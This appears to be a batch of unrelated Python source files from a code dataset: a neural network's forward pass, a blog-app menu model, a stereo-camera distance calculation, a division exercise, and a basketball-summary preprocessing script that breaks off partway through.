forward(self, image):\n batch_size = len(image)\n x = 2*image-1 # ; print('input ', x.shape)\n\n x = self.b0(x) #; print (x.shape) # torch.Size([2, 40, 256, 256])\n x = self.b1(x) #; print (x.shape) # torch.Size([2, 24, 256, 256])\n x = self.b2(x) #; print (x.shape) # torch.Size([2, 32, 128, 128])\n x = self.b3(x) #; print (x.shape) # torch.Size([2, 48, 64, 64])\n x = self.b4(x) #; print (x.shape) # torch.Size([2, 96, 32, 32])\n x = self.b5(x) #; print (x.shape) # torch.Size([2, 136, 32, 32])\n #------------\n \n #-------------\n x = self.b6(x) #; print (x.shape) # torch.Size([2, 232, 16, 16])\n mask = self.mask(x)\n x = self.b7(x) #; print (x.shape) # torch.Size([2, 384, 16, 16])\n x = self.b8(x) #; print (x.shape) # torch.Size([2, 1536, 16, 16])\n# x = self.act2(x)\n x = F.adaptive_avg_pool2d(x,1).reshape(batch_size,-1)\n #x = F.dropout(x, 0.5, training=self.training)\n# x = self.lin(x)\n logit = self.logit(x)\n return logit, mask\n\n\n\n\n# check #################################################################\n\ndef run_check_net():\n batch_size = 2\n C, H, W = 3, 512, 512\n #C, H, W = 3, 640, 640\n image = torch.randn(batch_size, C, H, W).cuda()\n mask = torch.randn(batch_size, num_study_label, H, W).cuda()\n\n net = Net().cuda()\n logit, mask = net(image)\n\n print(image.shape)\n print(logit.shape)\n print(mask.shape)\n\n\n# main #################################################################\nif __name__ == '__main__':\n run_check_net()\n\n\n","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"73209266","text":"from zoundry.appframework.global_services import getResourceRegistry\r\nfrom zoundry.appframework.ui.widgets.controls.common.menu.menumodel import ZPluginMenuModel\r\nfrom zoundry.blogapp.constants import IZBlogAppActionIDs\r\nfrom zoundry.blogapp.constants import IZBlogAppMenuIds\r\n\r\n\r\nMENU_ITEMS = [\r\n # gravity, actionId, boldFlag, iconPath\r\n (5, IZBlogAppActionIDs.BLOG_NEW_BLOG_POST_ACTION, False, u\"images/common/menu/blog/newpost.png\"), #$NON-NLS-1$\r\n (20, IZBlogAppActionIDs.DOWNLOAD_BLOG_TEMPLATE_ACTION, False, u\"images/common/menu/blog/download_template.png\"), #$NON-NLS-1$\r\n (55, IZBlogAppActionIDs.VIEW_BLOG_ACTION, False, u\"images/common/menu/view_online.png\"), #$NON-NLS-1$\r\n (65, IZBlogAppActionIDs.CONFIGURE_BLOG_ACTION, False, u\"images/common/menu/blog/configure.png\"), #$NON-NLS-1$\r\n]\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Menu model used for the Blog context menu.\r\n# ------------------------------------------------------------------------------\r\nclass ZBlogMenuModel(ZPluginMenuModel):\r\n\r\n def __init__(self):\r\n ZPluginMenuModel.__init__(self, IZBlogAppMenuIds.ZID_BLOG_MENU)\r\n\r\n self._buildModel()\r\n # end __init__()\r\n\r\n def _buildModel(self):\r\n registry = getResourceRegistry()\r\n\r\n for (gravity, actionId, boldFlag, iconPath) in MENU_ITEMS:\r\n menuId = self.addMenuItemWithActionId(gravity, actionId, None)\r\n self.setMenuItemBold(menuId, boldFlag)\r\n if iconPath is not None:\r\n bitmap = registry.getBitmap(iconPath)\r\n self.setMenuItemBitmap(menuId, bitmap)\r\n\r\n self.addSeparator(50)\r\n # end _buildModel()\r\n\r\n# end ZBlogMenuModel\r\n\r\n","sub_path":"src/python/zoundry/blogapp/ui/menus/blog/blogmenu.py","file_name":"blogmenu.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"477904373","text":"import cv2\nimport numpy as np\nimport math\n\n#Takes an image and returns an inverted blured (noise removed) binary image in its place\ndef biModalInvBlur(image):\n\n\t#turns all pixels that are darker than 60 -> 255, all others 0\n\timage1 = cv2.threshold(image, 60, 255, cv2.THRESH_BINARY_INV)\n\t\n\theight, width = image.shape\n\t\n\t#add border and blur to remove noise from image\n\ttempImg = cv2.copyMakeBorder(image1[1],5,5,5,5,cv2.BORDER_CONSTANT,value=(0,0,0,0))\t\n\ttempImg = cv2.medianBlur(tempImg,7)\n\t\n\t#return bimodal image\n\timage = tempImg[5:5+height,5:width+5]\n\treturn image\n\t\n\n#Takes an image and returns the center of mass of the white central contour\n#for this function to work the image must be binary, and the noise must be removed\n#such that there is only one contour in the image\n#centroid[0] is the x cooridnate\n#centroid[1] is the y cooridnate\ndef centerMass(image):\n\n\t#find the moments of the image\n\tmoments = cv2.moments(image,True)\n\t\n\tcentroid = ( moments['m10']/moments['m00'],moments['m01']/moments['m00'] )\n\t\n\n\treturn centroid\n\t\n\t\ndef undistortImg(image, intrinsicMatrix, distortionCoeffs, refinedCameraMatrix, ROI):\n\t\n\t# undistort\n\tundistortedImage = cv2.undistort(image, intrinsicMatrix, distortionCoeffs, None, refinedCameraMatrix)\n\n\t# crop the image\n\tx,y,w,h = ROI\n\tundistortedImage = undistortedImage[y:y+h, x:x+w]\n\t\t\n\treturn undistortedImage\n\t\n\t\n#alpha2angle takes in the number of pixels from the left edge of an undistorted image and returns how many radians that is from camA\n#this works for LeftCam\ndef convert2Alpha(pixels):\n \n #each pixel is N deg in FOV\n #multiply the number of pixels by that conversion factor to get degress from the left\n #convert to radians\n\n\tdegPerPixel = 0.574712\n\t#X is the angle of the left edge of the picture\n\t#X = 59.65\n\tX = 120.34\n\t#alpha = 20 / 33.9333333*pixels*-1\n\talpha = degPerPixel*pixels\n\t#the left camera is mounted pivioted in X deg\n\talpha = X - alpha\n\treturn math.radians(alpha)\n\n#this works for RightCam\ndef convert2Beta(pixels):\n\n\tdegPerPixel = 0.515464\n\t#X is the angle of the left edge of the picture\n\tX = 25\n\tbeta = degPerPixel*pixels\n\t#the right camera is mounted pivioted in X deg\n\tbeta = X + beta\n\treturn math.radians(beta)\n\t\ndef calculateAngleAndDistance(leftImage, rightImage, leftCamera, rightCamera):\n\t#returned values are: \n\t#\tthe distance for the center point of the robot to the object\n\t#\tthe angle for that same center point (negative is left)\n\n\t#Outline of steps\n\t#Load Intrisic Matricies\n\t#Load Distortion Coeficcients\n\n\t#Load Left Image\n\t##Make Image Bimodal\n\t##Undistort Image\n\t##Find center of mass\n \n\t#Load Right Image\n\t##Make Image Bimodal\n\t##Undistort Image\n\t##Find center of mass \n\n\t#Use law of cosines to calculate distance\n\n\tbwImageLeft = biModalInvBlur(leftImage)\n\tuImageLeft = undistortImg(bwImageLeft, leftCamera['intrinsicMatrix'], leftCamera['distortionCoeffs'], leftCamera['refinedCameraMatrix'], leftCamera['roi'])\n\tcenterLeft = centerMass(uImageLeft)\n\t\n\tbwImageRight = biModalInvBlur(rightImage)\n\tuImageRight = undistortImg(bwImageRight, rightCamera['intrinsicMatrix'], rightCamera['distortionCoeffs'], rightCamera['refinedCameraMatrix'], rightCamera['roi'])\n\tcenterRight = centerMass(uImageRight)\n\t\n\t#these are radians from left and right\n\talpha = convert2Alpha(centerLeft[0])\n\n\tbeta = convert2Beta(centerRight[0])\n\t\n\treturnObj = privateDistanceFcnLeft(alpha, beta)\n\t\n\t\n\treturn returnObj\n\t\ndef privateDistanceFcnLeft(alpha, beta):\n\tS = (177.8 * math.sin(beta)) / (math.sin(math.pi - beta - alpha))\n\tobjDistance = math.sqrt(7903.21 + (S*S) - (177.8 * S * math.cos(alpha)))\n\ttmpVar = S*math.sin(alpha)/objDistance\n\n\tangle1 = math.asin(88.9*math.sin(alpha)/objDistance)\n\tomega = math.pi - angle1 - alpha\n\t\n\ttheta = (math.pi/2) - omega\n\ttheta = math.degrees(theta)\n\t\n\treturn (objDistance, theta)\n\t\ndef privateDistanceFcnRight(alpha, beta):\n\tS = (177.8 * math.sin(beta)) / (math.sin(math.pi - beta-alpha))\n\tobjDistance = math.sqrt(7903.21 + (S*S) - (177.8 * S * math.cos(beta)))\n\tangle1 = math.asin(88.9*math.sin(beta)/objDistance)\n\tomega = math.pi - angle1 - beta\n\ttheta = (math.pi/2) - omega\n\ttheta = math.degrees(theta)\n\t\n\treturn [objDistance, theta]\n\n","sub_path":"python/FinalDemo/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"275118210","text":"n1=int(input())\nn2=int(input())\nnum1=abs(n1)\nnum2=abs(n2)\nsum=0\nwhile(num1>=num2):\n sum=sum+1\n num1=num1-num2\n\nnum=n1*n2\nif(num<0): sum=0-sum\nprint(sum)","sub_path":"Code/CodeRecords/2068/60773/244186.py","file_name":"244186.py","file_ext":"py","file_size_in_byte":158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"267958255","text":"import re, io, copy, os, sys, argparse, json, pdb, jsonlines\nfrom tqdm import tqdm\nfrom collections import Counter, OrderedDict\nfrom domain_knowledge import Domain_Knowledge\nknowledge_container = Domain_Knowledge()\n\nDELIM = \"│\"\nUNK = 0\nNA = 'N/A'\nPAD_WORD = ''\nUNK_WORD = ''\nBOS_WORD = ''\nEOS_WORD = ''\n\n# ------------------------------- #\n# --- very important patterns --- #\n# ------------------------------- #\n\n# a long pattern with 2-6 numbers\npattern1 = re.compile(\"\\( (?:\\d+ - \\d+ FG)?(?: (?:,|\\.) \\d+ - \\d+ 3PT)?(?: (?:,|\\.) \\d+ - \\d+ FT)? \\)\")\n\n# patterns with 1 number\npattern2 = re.compile(\"assist(?:ed)? on \\d+\")\n# the + field, three_point, free, charity, floor; behind/beyond the arc/three; deep/distance/long range;\npattern3 = re.compile(\"\\d+ percent from the \\S+\")\n\n# patterns with 2 numbers\npattern4 = re.compile(\"\\d+ (?:- )?(?:of|for|-) (?:- )?(?:\\S+ )?\\d+ (?:shooting )?from (?:the )?\\S+\")\npattern5 = re.compile(\"\\d+ (?:- )?(?:of|for) (?:- )?(?:\\S+ )?\\d+ \\S+\")\npattern6 = re.compile(\"\\( \\d+ - \\d+ \\)\")\npattern7 = re.compile(\"\\d+ - \\d+\")\n\ncount_missing = dict.fromkeys(list(range(1, 43)), 0)\n\nword2record = {\n 8: ('board', 'REB'),\n 9: ('assist', 'AST'),\n 10: ('dime', 'AST'),\n 11: ('minute', 'MIN'),\n 12: ('percent', 'PCT'),\n 13: ('steal', 'STL'),\n 14: ('block', 'BLK'),\n 15: ('turnover', 'TOV'),\n 16: ('three_pointer', 'FG3'),\n 17: ('three_point', 'FG3'),\n 18: ('three', 'FG3'),\n 19: ('3PT', 'FG3'),\n 20: ('attempt', 'ATMP'),\n 21: ('free_throw', 'FT'),\n 22: ('shot', 'FG'),\n 23: ('offensive', 'OREB'),\n 24: ('offensively', 'OREB'),\n 25: ('made', 'FG'),\n 26: ('point', 'PTS'),\n 27: ('rebound', 'REB'),\n}\nword2record = OrderedDict(word2record)\n\npost_donts = {\n 28: ('quarter', None),\n 29: ('straight', None),\n 30: ('starter', None),\n 31: ('lead', None),\n 32: ('team', None),\n 33: ('content', None),\n 34: ('run', None),\n 35: ('tie', None),\n 36: ('game', None),\n 37: ('player', None),\n}\npost_donts = OrderedDict(post_donts)\n\npre_donts = {\n 38: ('combined? for(?: \\S+)? \\d+', None),\n 39: ('averag\\S+(?: \\S+)? \\d+', None),\n 40: ('\\d{4} - \\d{2,4}', None),\n 41: ('(?:first|last) \\d+ minutes?', None),\n 42: ('\\d+ minutes? (?:left|remaining)', None),\n}\n\npre_donts = OrderedDict(pre_donts)\n\nsuffix2field = dict.fromkeys(['field', 'floor'])\nsuffix2three = dict.fromkeys(['three_point', 'beyond', 'behind', 'long', 'deep', 'downtown', '3', 'distance'])\nsuffix2foul = dict.fromkeys(['free_throw', 'charity', 'line', 'foul', 'stripe'])\n\n# ----------------------------------------- #\n# --- identify patterns to be processed --- #\n# ----------------------------------------- #\n\ndef mark_records(sent):\n x = copy.deepcopy(sent)\n i = 1\n\n for idx, (k, v) in pre_donts.items():\n p = re.compile(k)\n delim = \"#DELIM{}#\".format(idx)\n for f in re.findall(p, x):\n rep = \"{}{}{}\".format(delim, delim.join(f.split()), delim)\n x = x.replace(f, rep)\n\n for p in [pattern1, pattern2, pattern3, pattern4, pattern5, pattern6, pattern7]:\n delim = \"#DELIM{}#\".format(i)\n i += 1\n for f in re.findall(p, x):\n rep = \"{}{}{}\".format(delim, delim.join(f.split()), delim)\n x = x.replace(f, rep)\n\n for idx, (k, v) in (list(word2record.items()) + list(post_donts.items())):\n p = re.compile(\"\\d+ (?:- )*{}(?:s|ed)*\".format(k))\n delim = \"#DELIM{}#\".format(idx)\n for f in re.findall(p, x):\n rep = \"{}{}{}\".format(delim, delim.join(f.split()), delim)\n x = x.replace(f, rep)\n\n return x\n\n\n# ------------------------------- #\n# --- very important patterns --- #\n# ------------------------------- #\n\ndef _get_record(value, num2rcds, priority):\n candidates = num2rcds.get(value, None)\n if candidates is None:\n if len(priority) > 1:\n return [], False\n else:\n return None, False\n\n candidates = sorted(candidates, key=lambda x: len(x.split(DELIM)[2]))\n assert len(priority) > 0\n if len(candidates) == 1:\n check = False\n for p in priority:\n if p in candidates[0].split(DELIM)[-2]:\n check = True\n break\n\n if len(priority) > 1:\n return candidates, check\n else:\n return candidates[0], check\n else:\n results = []\n check = False\n for p in priority:\n for c in candidates:\n if p in c.split(DELIM)[2]:\n results.append(c)\n check = True\n if check:\n if len(priority) > 1:\n return results, True\n else:\n return results[0], True\n else:\n if len(priority) > 1:\n return [], False\n else:\n return None, False\n\n\ndef retrieve_record(value, num2rcds, priority):\n candidate, check = _get_record(value, num2rcds, priority)\n\n # discard found candidates if it's not the desired rcd_type when priority list contains only 1 unambiguous rcd_type\n # NOTE: many numbers, like percentage are rounded, so the correct number may be +-1\n # others are mistakes incidentally captured and corrected\n if len(priority) == 1 and not check:\n for v in [value - 1, value + 1]:\n candidate, check = _get_record(v, num2rcds, priority)\n if candidate is not None and check:\n value = v\n break\n return candidate, value\n\n\n# ------------------------------- #\n# --- very important patterns --- #\n# ------------------------------- #\n\ndef get_records(phrase, num2rcds, the_other_team_records):\n # print(phrase)\n p = re.compile(\"#DELIM(\\d+)#\")\n temp = re.findall(p, phrase)\n pattern_num = int(temp[0])\n try:\n assert all([int(x) == pattern_num for x in temp])\n except:\n print(\"{} is misformatted\".format(phrase))\n sys.exit(0)\n delim = \"#DELIM{}#\".format(pattern_num)\n tokens = [x for x in phrase.split(delim) if len(x) > 0]\n numbers_are_at = [i for x, i in zip(tokens, range(len(tokens))) if x.isdigit()]\n numbers = [int(x) for x in tokens if x.isdigit()]\n\n result = []\n if pattern_num == 1:\n true_numbers_are_at = []\n tmp = re.compile(\"\\( (?:\\d+ - \\d+ (FG))?(?: (?:,|\\.) \\d+ - \\d+ (3PT))?(?: (?:,|\\.) \\d+ - \\d+ (FT))? \\)\")\n suffix = [x for x in re.findall(tmp, ' '.join(phrase.split(delim)).strip())[0] if len(x) > 0]\n\n # fix typos\n if len(suffix) == 3:\n words_are_at = [i for x, i in zip(tokens, range(len(tokens))) if not x.isdigit()]\n suffix_temp = copy.deepcopy(suffix)\n if not suffix_temp[0] == 'FG':\n suffix[0] = 'FG'\n tokens[words_are_at[0]] = 'FG'\n if not suffix_temp[1] == '3PT':\n suffix[1] = '3PT'\n tokens[words_are_at[1]] = '3PT'\n if not suffix_temp[2] == 'FT':\n suffix[2] = 'FT'\n tokens[words_are_at[2]] = 'FT'\n\n i = 0\n for s in suffix:\n if s == 'FG':\n fgm, fga = numbers[i], numbers[i + 1]\n cp1, num1 = retrieve_record(fgm, num2rcds, priority=['FGM'])\n cp2, num2 = retrieve_record(fga, num2rcds, priority=['FGA'])\n elif s == '3PT':\n fg3m, fg3a = numbers[i], numbers[i + 1]\n cp1, num1 = retrieve_record(fg3m, num2rcds, priority=['FG3M'])\n cp2, num2 = retrieve_record(fg3a, num2rcds, priority=['FG3A'])\n elif s == 'FT':\n ftm, fta = numbers[i], numbers[i + 1]\n cp1, num1 = retrieve_record(ftm, num2rcds, priority=['FTM'])\n cp2, num2 = retrieve_record(fta, num2rcds, priority=['FTA'])\n else:\n print(\"*** WARNING *** other pattern found {}\".format(phrase))\n print(\"phrase = {}\".format(phrase))\n print(\"s = {}\".format(s))\n print(\"suffix = {}\".format(suffix))\n sys.exit(0)\n if cp1 is None or cp2 is None:\n pass\n else:\n if cp1.split(DELIM)[-2][:2] == cp2.split(DELIM)[-2][:2]:\n true_numbers_are_at.extend(numbers_are_at[i:i + 1 + 1])\n tokens[numbers_are_at[i]] = str(num1)\n tokens[numbers_are_at[i + 1]] = str(num2)\n result.extend([cp1, cp2])\n else:\n pass\n i += 2\n numbers_are_at = true_numbers_are_at\n\n elif pattern_num == 2:\n cp, num = retrieve_record(numbers[0], num2rcds, priority=['AST'])\n if cp is not None:\n tokens[-1] = str(num)\n result.append(cp)\n\n elif pattern_num == 3:\n # the + field, three_point, free, charity, floor; behind/beyond the arc/three; deep/distance/long range;\n tmp = re.compile('\\d+ percent from (\\S+) (\\S+)')\n suf_1, suf_2 = re.findall(tmp, ' '.join(phrase.split(delim)).strip())[0]\n\n if suf_2 == '3':\n suf_2 = 'three_point'\n numbers_are_at.pop(-1)\n\n if suf_1 == 'the':\n if suf_2 in ['field', 'floor']:\n priority = ['FG_PCT']\n elif suf_2 == 'three_point':\n priority = ['FG3_PCT']\n elif suf_2 in ['free', 'charity']:\n priority = ['FT_PCT']\n else:\n priority = ['PCT']\n else:\n if suf_1 in ['behind', 'beyond', 'deep', 'distance', 'long']:\n priority = ['FG3_PCT']\n else:\n priority = ['PCT']\n cp, num = retrieve_record(numbers[0], num2rcds, priority=priority)\n if cp is not None:\n tokens[0] = str(num)\n result.append(cp)\n\n elif 4 <= pattern_num <= 7:\n if len(numbers) == 2:\n num1, num2 = numbers\n else:\n if numbers[-1] == 3:\n num1, num2, _ = numbers\n numbers_are_at.pop(-1)\n else:\n raise ValueError(\"*** WARNING *** phrase misformatted {}\".format(phrase))\n\n if pattern_num == 4:\n tmp = re.compile(\"\\d+ (?:- )?(?:of|for|-) (?:- )?(?:\\S+ )?\\d+ (?:shooting )?from (?:the )?(\\S+)\")\n suffix = re.findall(tmp, ' '.join(phrase.split(delim)).strip())[0]\n if suffix in suffix2field or suffix in suffix2three or suffix in suffix2foul:\n if suffix in suffix2field:\n p1 = ['FGM']\n p2 = ['FGA']\n elif suffix in suffix2three:\n p1 = ['FG3M']\n p2 = ['FG3A']\n elif suffix in suffix2foul:\n p1 = ['FTM']\n p2 = ['FTA']\n cp1, num1 = retrieve_record(num1, num2rcds, priority=p1)\n cp2, num2 = retrieve_record(num2, num2rcds, priority=p2)\n else:\n p1 = ['FG3M', 'FGM', 'FTM']\n p2 = ['FG3A', 'FGA', 'FTA']\n temp1, num1 = retrieve_record(num1, num2rcds, priority=p1)\n temp2, num2 = retrieve_record(num2, num2rcds, priority=p2)\n cp1, cp2 = None, None\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1]:\n cp1 = x\n cp2 = y\n break\n\n elif pattern_num == 5:\n tmp = re.compile(\"\\d+ (?:- )?(?:of|for) (?:- )?(?:\\S+ )?\\d+ (\\S+)\")\n suffix = re.findall(tmp, ' '.join(phrase.split(delim)).strip())[0]\n if suffix.startswith('sho'): # shot/shooting\n p1 = ['FGM']\n p2 = ['FGA']\n cp1, num1 = retrieve_record(num1, num2rcds, priority=p1)\n cp2, num2 = retrieve_record(num2, num2rcds, priority=p2)\n else:\n p1 = ['FG3M', 'FGM', 'FTM']\n p2 = ['FG3A', 'FGA', 'FTA']\n temp1, num1 = retrieve_record(num1, num2rcds, priority=p1)\n temp2, num2 = retrieve_record(num2, num2rcds, priority=p2)\n cp1, cp2 = None, None\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1]:\n cp1 = x\n cp2 = y\n break\n\n elif pattern_num == 6:\n cp1, num1 = retrieve_record(num1, num2rcds, priority=['TEAM-WINS'])\n cp2, num2 = retrieve_record(num2, num2rcds, priority=['TEAM-LOSSES'])\n if cp1 is None or cp2 is None:\n cp1, num1 = retrieve_record(num1, num2rcds, priority=['TEAM-LOSSES'])\n cp2, num2 = retrieve_record(num2, num2rcds, priority=['TEAM-WINS'])\n if cp1 is None or cp2 is None:\n # if len(priority) > 1, cp1 and cp2 are lists\n temp1, num1 = retrieve_record(num1, num2rcds, priority=['FG3M', 'FGM', 'FTM', 'REB'])\n temp2, num2 = retrieve_record(num2, num2rcds, priority=['FG3A', 'FGA', 'FTA', 'REB'])\n\n cp1, cp2 = None, None\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1]:\n cp1 = x\n cp2 = y\n break\n\n elif pattern_num == 7:\n if the_other_team_records is not None:\n cp1, num1 = retrieve_record(num1, num2rcds, priority=['TEAM-PTS'])\n cp2, num2 = retrieve_record(num2, the_other_team_records, priority=['TEAM-PTS'])\n if cp1 is None or cp2 is None:\n cp1, num1 = retrieve_record(num1, the_other_team_records, priority=['TEAM-PTS'])\n cp2, num2 = retrieve_record(num2, num2rcds, priority=['TEAM-PTS'])\n\n if cp1 is None or cp2 is None:\n # if not found separately, combine and continue searching\n for k, v in the_other_team_records.items():\n if not k in num2rcds:\n num2rcds[k] = v\n else:\n num2rcds[k].extend(v)\n temp1, num1 = retrieve_record(num1, num2rcds,\n priority=['TEAM-WINS', 'TEAM-PTS', 'REB', 'AST', 'FTM', 'FGM',\n 'FG3M'])\n temp2, num2 = retrieve_record(num2, num2rcds,\n priority=['TEAM-LOSSES', 'TEAM-PTS', 'REB', 'AST', 'FTA', 'FGA',\n 'FG3A'])\n cp1, cp2 = None, None\n\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1] or (\n x.split(DELIM)[2] == 'TEAM-WINS' and y.split(DELIM)[2] == 'TEAM-LOSSES'):\n cp1 = x\n cp2 = y\n break\n else:\n temp1, num1 = retrieve_record(num1, num2rcds,\n priority=['TEAM-WINS', 'TEAM-PTS', 'REB', 'AST', 'FTM', 'FGM', 'FG3M'])\n temp2, num2 = retrieve_record(num2, num2rcds,\n priority=['TEAM-LOSSES', 'TEAM-PTS', 'REB', 'AST', 'FTA', 'FGA', 'FG3A'])\n cp1, cp2 = None, None\n\n for x in temp1:\n for y in temp2:\n if x.split(DELIM)[2][:-1] == y.split(DELIM)[2][:-1] or (\n x.split(DELIM)[2] == 'TEAM-WINS' and y.split(DELIM)[2] == 'TEAM-LOSSES'):\n cp1 = x\n cp2 = y\n break\n\n if cp1 is None or cp2 is None:\n pass\n else:\n _, team_1, rcd_type_1, _ = cp1.split(DELIM)\n _, team_2, rcd_type_2, _ = cp2.split(DELIM)\n\n if rcd_type_1.startswith('TEAM'):\n if not rcd_type_2.startswith('TEAM'):\n pass\n else:\n if rcd_type_1 == 'TEAM-WINS':\n if not rcd_type_2 == 'TEAM-LOSSES':\n pass\n else:\n if team_1 == team_2:\n tokens[numbers_are_at[0]] = str(num1)\n tokens[numbers_are_at[1]] = str(num2)\n result = [cp1, cp2]\n else:\n pass\n\n elif rcd_type_1 == 'TEAM-PTS':\n if not rcd_type_2 == 'TEAM-PTS':\n pass\n else:\n if not (team_1 == team_2):\n tokens[numbers_are_at[0]] = str(num1)\n tokens[numbers_are_at[1]] = str(num2)\n result = [cp1, cp2]\n else:\n pass\n\n else:\n # enforcing a pair of digits having the same rcd_type\n if rcd_type_1 == rcd_type_2 and team_1 != team_2:\n tokens[numbers_are_at[0]] = str(num1)\n tokens[numbers_are_at[1]] = str(num2)\n result = [cp1, cp2]\n else:\n pass\n\n else:\n if cp1.split(DELIM)[-2][:2] == cp2.split(DELIM)[-2][:2]:\n tokens[numbers_are_at[0]] = str(num1)\n tokens[numbers_are_at[1]] = str(num2)\n result = [cp1, cp2]\n else:\n pass\n\n elif 8 <= pattern_num <= 27:\n k, v = word2record[pattern_num]\n priority = [v]\n cp, num = retrieve_record(numbers[0], num2rcds, priority=priority)\n if cp is not None:\n tokens[0] = str(num)\n result.append(cp)\n\n elif 28 <= pattern_num <= 42:\n pass\n\n else:\n print(phrase)\n print(num2rcds)\n raise ValueError(\"pattern_num {} is invalid\".format(pattern_num))\n\n correct_phrase = ' '.join([x.strip() for x in tokens if len(x.strip()) > 0])\n\n if not len(result) > 0:\n count_missing[pattern_num] += 1\n\n return result, correct_phrase, numbers_are_at\n\n\n# -------------- #\n# --- main() --- #\n# -------------- #\nRCD_PER_PLAYER = 21\nRCD_PER_TEAM = 15\nNUM_PLAYERS = 26\nNUM_TEAMS = 2\n\nalias2team = knowledge_container.alias2team\nsingular_prons = knowledge_container.singular_prons\nplural_prons = knowledge_container.plural_prons\n\n\ndef _tokenize(word):\n return ' '.join(word.split('_'))\n\ndef _any_other_player(sent):\n \"\"\"\n no idea why some games have missing players\n \"\"\"\n tokens = sent.strip().split()\n # only checking 2-word names for simplicity\n two_grams = [' '.join(tokens[i:i+2]) for i in range(len(tokens))]\n for name in two_grams:\n if name in knowledge_container.player_lookup:\n return True\n return False\n\ndef main(args, DATASET):\n player_not_found = 0\n\n BASE_DIR = os.path.join(args.dir, \"new_clean/{}\".format(DATASET))\n\n input_files = [\n \"src_%s.norm.tk.txt\" % DATASET,\n \"tgt_%s.norm.mwe.txt\" % DATASET,\n \"tgt_%s.norm.filter.mwe.txt\" % DATASET\n ]\n\n clean_src, clean_tgt, clean_tgt_filter = [os.path.join(BASE_DIR, f) for f in input_files]\n\n output_files = [\n \"%s.trim.json\" % DATASET,\n \"%s_content_plan_tks.txt\" % DATASET,\n \"%s_content_plan_ids.txt\" % DATASET,\n \"%s_ptrs.txt\" % DATASET,\n \"tgt_%s.norm.filter.mwe.trim.txt\" % DATASET,\n \"tgt_%s.norm.filter.mwe.trim.full.txt\" % DATASET,\n \"src_%s.norm.trim.txt\" % DATASET\n ]\n\n js_clean, cp_out_tks, cp_out_ids, ptrs_out, clean_tgt_trim, clean_tgt_trim_full, clean_src_trim = \\\n [os.path.join(BASE_DIR, f) for f in output_files]\n\n JSON_DIR = os.path.join(args.dir, \"new_jsonl\")\n js = os.path.join(JSON_DIR, \"{}.jsonl\".format(DATASET))\n\n sent_count = 0\n empty_sent = 0\n output_count = 0\n with io.open(clean_src, 'r', encoding='utf-8') as fin_src, \\\n io.open(clean_tgt, 'r', encoding='utf-8') as fin_tgt, \\\n io.open(clean_tgt_filter, 'r', encoding='utf-8') as fin_tgt_filter, \\\n jsonlines.open(js, 'r') as fin_js, \\\n io.open(js_clean, 'w+', encoding='utf-8') as fout_js, \\\n io.open(cp_out_tks, 'w+', encoding='utf-8') as fout_cp_tks, \\\n io.open(cp_out_ids, 'w+', encoding='utf-8') as fout_cp_ids, \\\n io.open(ptrs_out, 'w+', encoding='utf-8') as fout_ptr, \\\n io.open(clean_tgt_trim, 'w+', encoding='utf-8') as fout_tgt, \\\n io.open(clean_tgt_trim_full, 'w+', encoding='utf-8') as fout_tgt_full, \\\n io.open(clean_src_trim, 'w+', encoding='utf-8') as fout_src:\n\n output_table = []\n\n original_summaries = fin_tgt.read().strip().split('\\n')\n\n targets = fin_tgt_filter.read()\n targets = targets.strip().split('\\n')\n\n inputs = fin_src.read()\n inputs = inputs.strip().split('\\n')\n\n assert len(original_summaries) == len(targets) == len(inputs)\n\n city2team = {}\n for idx, (inp, summary, full_summary, table_original) in \\\n tqdm(enumerate(zip(inputs, targets, original_summaries, fin_js.iter(type=dict, skip_invalid=True)))):\n current_sent_players = OrderedDict()\n current_sent_teams = OrderedDict()\n\n # ------ get record to index lookup ------ #\n rcd2idx = {}\n assert len(inp.strip().split()) == RCD_PER_PLAYER*NUM_PLAYERS + RCD_PER_TEAM*NUM_TEAMS\n for i, rcd in enumerate(inp.strip().split()):\n value, field, rcd_type, ha = rcd.split(DELIM)\n if value == 'N/A' or field == 'N/A':\n continue\n if rcd in rcd2idx:\n print(\"*** WARNING *** duplicate record at line # {}\".format(i))\n rcd2idx[rcd] = str(i)\n\n # ------ get player and team record dictionary ------ #\n table = {\"Players\": {}, \"Teams\": {}}\n for rcd in inp.strip().split():\n value, field, rcd_type, ha = rcd.split(DELIM)\n if rcd_type.startswith(\"TEAM\") or rcd_type.startswith('GAME'):\n if not field in table['Teams']:\n table['Teams'].update({field: [rcd]})\n else:\n table['Teams'][field].append(rcd)\n if rcd_type == 'TEAM-CITY':\n city2team[value] = field\n else:\n if not field in table['Players']:\n table['Players'].update({field: [rcd]})\n else:\n table['Players'][field].append(rcd)\n\n # ------ process each sentence ------ #\n paragraph_plan = []\n paragraph_text = []\n sentences = summary.strip().split(' . ')\n word_pos = 0\n rcd_pos = 0\n pointers = []\n for cnt, sent in enumerate(sentences):\n sent_count += 1\n pre_check_player = [x for x in sent.strip().split() if x in table['Players']]\n pre_check_team = [x for x in sent.strip().split() if\n x in table['Teams'] or x in city2team or x in alias2team]\n\n # ------ extract player/team this sentence is talking about ------ #\n this_sent_records = []\n this_game_teams = list(table['Teams'].keys())\n\n if len(pre_check_player) > 0:\n # only reset when new player is mentioned in this sent\n current_sent_players = OrderedDict()\n for word in sent.strip().split():\n if word in table['Players']:\n if not word in current_sent_players:\n current_sent_players[word] = True\n else:\n player_found = False\n for word in sent.strip().split():\n if word in singular_prons:\n player_found = True\n # neither a new player is found nor a pronoun is referring to a previous player:\n # no player is mentioned in this sent\n\n if not player_found:\n current_sent_players = OrderedDict()\n\n elif _any_other_player(sent):\n current_sent_players = OrderedDict()\n player_not_found += 1\n\n if len(pre_check_team) > 0:\n # only reset when new team is mentioned in this sent\n current_sent_teams = 